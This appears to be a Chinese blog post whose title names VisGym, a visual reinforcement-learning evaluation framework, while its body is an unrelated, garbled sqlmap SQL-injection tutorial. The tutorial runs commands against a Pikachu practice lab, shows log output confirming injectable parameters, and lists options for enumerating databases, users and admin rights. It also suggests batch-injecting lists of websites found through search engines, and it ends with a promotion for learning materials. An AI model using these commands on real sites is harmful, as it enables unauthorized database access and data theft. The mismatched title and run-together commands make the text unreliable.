视觉强化学习评估框架VisGym的设计与实践
2026/5/6 6:04:27
这个就使用Kali中的sqlmap自带的
称之为万能参数,主要针对post注入
首先抓包
抓包过后 复制到文本文件中
执行命令
执行结果脚本
(XSS) attacks [21:11:02] [INFO] testing for SQL injection on GET parameter 'name' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n [21:12:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [21:12:10] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) [21:12:10] [WARNING] reflective value(s) found and filtering out [21:12:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [21:12:11] [INFO] testing 'Generic inline queries' [21:12:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [21:12:11] [INFO] GET parameter 'name' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable [21:12:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [21:12:11] [WARNING] time-based comparison requires larger statistical model, please wait........... (done) [21:12:21] [INFO] GET parameter 'name' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [21:12:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [21:12:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [21:12:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [21:12:21] [INFO] target URL appears to have 2 columns in query [21:12:21] [INFO] GET parameter 'name' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable [21:12:21] [WARNING] automatically patching output having last char trimmed GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap -u http://192.168.1.10/pikachu/vul/sqli/sqli_str.php?name=vinceyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=r5h7commep1...pdhht6s823'). Do you want to use those [Y/n] y ----------------------------------------------------------------------- 您尚未声明 cookie,而服务器想要设置自己的 cookie('PHPSESSID=r5h7commep1...pdhht6s823')。您是否要使用这些 cookie [Y/n] y使用方法:一般我都是使用3这个级别
sqlmap -r post.txt --level 3sqlmap -r post.txt --level 3 --risk 3sqlmap -r post.txt --level 3 --risk 3 -v 3 sqlmap -r post.txt --level 3 --risk 3 -v 5sqlmap -u http://192.168.1.10/pikachu/vul/sqli/sqli_str.php?name=vince -p namesqlmap -r get.txt -p namesqlmap -u http://192.168.1.10/pikachu/vul/sqli/sqli_str.php?name=vince -batch-smart就可以通过-m参数来批量注入,一般用于我们找到通过搜索引擎之类的方法找到多个网站网址,记录下来进行批量检测的时候用
sqlmap -m num.txt--dbs:会获取所有的数据库 //默认情况下sqlmap会自动的探测web应用后端的数据库类型:MySQL、 Oracle、PostgreSQL、MicrosoftSQL Server、Microsoft Access、SQLite、Firebird、 Sybase、SAPMaxDB、DB2 --current-user:大多数数据库中可检测到数据库管理系统当前用户 --current-db:当前连接数据库名 --is-dba:判断当前的用户是否为管理 --users:列出数据库所有所有用户http://192.168.0.15/sql.php?id=1 --dbs # 会获取所有的数据库 http://192.168.0.15/sql.php?id=1 --current-user #显示当前用户 http://192.168.0.15/sql.php?id=1 --current-db #当前连接数据库名 http://192.168.0.15/sql.php?id=1 --is-dba #判断当前的用户是否为管理 http://192.168.0.15/sql.php?id=1 --users #列出数据库所有所有用户网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取